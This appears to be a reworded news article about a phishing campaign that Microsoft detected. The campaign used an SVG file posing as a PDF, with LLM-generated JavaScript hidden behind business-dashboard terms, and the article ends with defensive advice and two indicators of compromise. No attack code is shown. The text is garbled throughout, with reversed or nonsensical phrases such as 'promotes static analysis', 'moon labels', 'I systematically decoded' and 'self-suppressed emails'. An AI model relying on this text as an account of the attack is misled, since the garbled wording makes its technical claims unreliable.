A recent qualification phishing campaign detected by Microsoft Threat Intelligence used code that was unique to AI in SVG files to impersonate malicious behavior.
New obfuscation techniques introduced attackers' ingenuity, but AI-powered defenses blocked attacks well. We believe that Ai-Augmented threats remain detectable when defenders adapt their analytical strategies.
On August 18, Microsoft Threat Intelligence identified a targeted phishing campaign that uses compromised small business email accounts to distribute credential-stolen emails.
The attacker attached a file named “23MB – PDF-6 Pages.SVG”, which was designed to pose as a PDF despite the SVG extension. SVG is increasingly preferred by threat actors because it allows text-based embedding of JavaScript and dynamic content, and promotes static analysis and sophisticated obfuscation that can slip beyond sandboxes.
Once opened, SVG redirected the user to a Captcha-based verification page. This is a familiar social engineering tactic aimed at building trust and slowing doubts among users.
The defender blocked access before the fake login page was displayed, but investigations revealed that JavaScript embedded within the SVG rebuilds the phishing landing page to harvest the credentials.
Business Terminology as a Decoy
Rather than adopting standard cryptographic obfuscation, the attacker used a simulated business analytics language to hide the payload.
First, the SVG code began with Invisible Elements, styled as “Business Performance Dashboard.” It features chart bars and moon labels rendered with zero opacity and transparent fills intended to mislead anyone inspecting the file.
Second, the actual payload was encoded within a long sequence of business-related conditions (e.g., revenue, operations, risk, stocks) stored hiddenly data-analytics Invisible attributes
Embedded JavaScript used multiple conversion steps to process these terms and mapped a sequence of business terms to characters and instructions.
Once the script was run, I systematically decoded the metadata to rebuild functionality for redirection, browser fingerprinting, and session tracking.
A Microsoft Security Copilot analysis determined that SVG code is likely to be generated by large language models due to its complexity and redundancy specification rules (e.g. processBusinessMetricsf43e08), module yet overdesigned structures, general formal comments, and unnecessary inclusion of XML declarations and CDATA wrappers.
These properties indicated code artifacts generated in typical AI and provided additional detection signals.
This systematic approach is a hallmark of AI/LLM outputs, and tends to overdesign and generalize solutions.
Despite attackers using AI for obfuscation, Microsoft Defender, AI-driven protection in Office 365, has thwarted the campaign by analyzing infrastructure, behavior, and message context rather than inspecting payload code.
Important detection signals were redirected to domains linked to self-suppressed emails containing BCC recipients, suspicious selection of SVG files with names like PDFs, known phishing content, common code obfuscation patterns, and network behaviors such as session tracking and fingerprinting.
To strengthen defense against similar AI-stimulated phishing threats, organizations need to:
- Implement online protection for replacement and recommended settings for Office 365 Defenders.
- Enabling Zero-Time Automatic Purge (ZAP) to retroactively quarantine malicious emails.
- Use your browser to block known phishing sites using smart screen filters.
- Deploy cloud delivery protection to antivirus solutions for rapid protection against new attack variants.
- It uses phishing-resistant authentication methods and enforces conditional access policies that require strong authentication for critical applications.
As enemies integrate AI into an offensive toolkit, security teams need to continue leveraging AI-driven analytics focusing on attack patterns, infrastructure traits, and behavioral anomalies.
Although AI-generated obfuscation can evolve, shift detection beyond code syntax into the broader context of phishing tactics allows defenders to go ahead of new threats.
Indicators for compromise
Here is the tabular information:
| indicator | type | explanation | I was first seen | Last seen |
|---|---|---|---|---|
| kmnl[.]cpfcenters[.]de | domain | Domains that host phishing content | 08/18/2025 | 08/18/2025 |
| 23MB – PDF- Page 6[.]SVG | File name | SVG attachment file name | 08/18/2025 | 08/18/2025 |
Follow on Google News, LinkedIn, X to get instant updates and set GBH as Google's preferred source.
